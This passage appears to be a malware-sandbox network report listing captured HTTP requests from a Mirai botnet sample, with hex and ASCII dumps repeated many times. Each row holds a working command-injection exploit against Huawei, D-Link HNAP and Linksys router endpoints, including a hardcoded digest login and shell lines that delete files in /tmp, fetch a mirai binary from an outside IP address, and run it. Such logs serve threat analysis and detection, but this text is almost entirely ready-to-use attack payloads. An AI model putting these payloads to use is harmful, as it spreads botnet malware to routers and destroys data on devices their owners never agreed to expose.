6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
